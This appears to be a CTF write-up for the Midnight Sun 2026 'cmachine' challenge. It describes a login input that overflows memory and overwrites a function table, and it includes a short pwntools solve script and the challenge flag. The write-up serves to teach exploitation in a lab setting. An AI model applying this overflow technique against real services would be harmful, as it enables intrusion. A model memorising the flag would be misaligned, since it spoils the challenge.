Author: zerodaygym

Midnight Sun CTF 2026 qualifiers - cmachine

Author: @acez

Description

Sometimes reversing is just blackbox pwning.

nc cmashine.play.ctf.se 9190

Flag format: midnight{…} Flag: midnight{700_b1G_f0r_th3_m4ch1ne}

Writeup

We are given a host and a port to connect to using netcat. After connecting we see this complex machine interface:

And after typing help we can see some documented commands. In the previous and easier challenge smashine we had to call the win command by setting any register to 0x1337 so I immediately ignored all commands from the previous challenge and focused on the new ones. The few interesting ones were mem command which returned the memory:

We can clearly see that the entire memory is empty except that from 0x100 there were 4 different strings, which were similar to functions. By typing functions command we can confirm it:

Another interesting command was login. By typing login and some random password string we get greeted with a message that the password was incorrect, but then after inspecting the memory we can observe that the incorrect password was written there:

I immediately tested if I can overwrite some of those functions by giving a large string to the program and fortunately I was able to:

After some trial and error of trying different functions I decided to try to overwrite the echo function with the win function, which was the solution to the previous challenge and it worked. I calculated the exact offset from the function and by filling it with null characters and then the win function, I was able to call win and I got the flag:

Solve script:

from pwn import *
 
r = remote('cmashine.play.ctf.se', 9190)
r.sendlineafter(b'> ', b'login '+b'\x00'*(0xFF+1)+b'win')
 
r.recvuntil(b'> ')
 
r.interactive()
 
# Then just type `win` to the console.